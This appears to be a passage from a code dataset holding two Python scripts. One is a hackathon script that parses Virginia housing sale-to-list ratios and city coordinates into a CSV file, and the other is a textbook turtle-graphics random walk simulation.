matplotlib.pyplot as plt\n\n#adds to saleToListVA dictionary\ncityList = []\nratioList = []\nratioCity = {}\nwith open('C:\\\\Users\\\\espos\\\\Documents\\\\GitHub\\\\mlh-hackathon-flask-starter\\\\app\\\\datasets\\\\SaleToListRatio_City.csv') as csv_file:\n vaEstate = csv.DictReader(csv_file)\n for va in vaEstate:\n if (va['StateName'] == \"VA\"):\n ratioList.append(va['2019-11'])\n cityList.append(va['RegionName'])\n ratioCity[va['RegionName']] = va['2019-11']\nx = 0\nlatVA = []\nlongVA = []\ncity_file = open(\"cityVA.csv\", \"w\")\ncityWriter = csv.writer(city_file)\ncityWriter.writerow(['CityName', 'Latitude', 'Longitude', 'S/L Ratio'])\nwith open('C:\\\\Users\\\\espos\\\\Documents\\\\GitHub\\\\mlh-hackathon-flask-starter\\\\app\\\\datasets\\\\us-zip-code-latitude-and-longitude\\\\va-zip-code-latitude-and-longitude.csv') as csv_file2:\n csvValues = []\n vaCity = csv.DictReader(csv_file2)\n for urban in vaCity:\n csvValues = urban['Zip;City;State;Latitude;Longitude;Timezone;Daylight savings time flag;geopoint'].split(';')\n for i in cityList:\n if (i == csvValues[1]):\n #print(i)\n print(csvValues[1] + \" \" + csvValues[3] + \" \" + csvValues[4])\n# print(float(csvValues[3]))\n# print(float(csvValues[4]))\n latVA.append(float(csvValues[3]))\n longVA.append(float(csvValues[4]))\n cityWriter.writerow([csvValues[1], csvValues[3], csvValues[4], ratioCity[csvValues[1]]])\ncity_file.close()\n","sub_path":"app/vaParse.py","file_name":"vaParse.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"334133388","text":"\"\"\"\nPurpose : Simulate Random Walks\nAuthor : Vivek T S\nDate : 12/11/2018\n\"\"\"\nimport turtle\nimport random\nimport math\n\ndef randomWalk(steps, tortoise):\n\t\"\"\"\n\tDescription :\n\t\tEmulate random walks\n\tParameters :\n\t\tsteps - no. of steps needed to take\n\t\ttortoise - turtle class handler\n\tReturn value:\n\t\tdistance from origin\n\t\"\"\"\n\tx=0\n\ty=0\n\tmoveLength=10\n\tfor step in range(steps):\n\t\tr = random.random()\n\t\tif r < 0.25:\n\t\t\tx=x+1\n\t\telif r < 0.5:\n\t\t\ty=y+1\n\t\telif r < 0.75:\n\t\t\tx=x-1\n\t\telse:\n\t\t\ty=y-1\n\t\ttortoise.goto(x*moveLength,y*moveLength)\n\treturn math.sqrt(x*x+y*y)\n\ndef main():\n\ttortoise = turtle.Turtle()\n\tsteps = int(input('Steps : '))\n\trandomWalk(steps, tortoise)\n\nmain()\n","sub_path":"4. Discovering Computer Science/Python/Chapter 5 - Forks in the road/randomwalks.py","file_name":"randomwalks.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}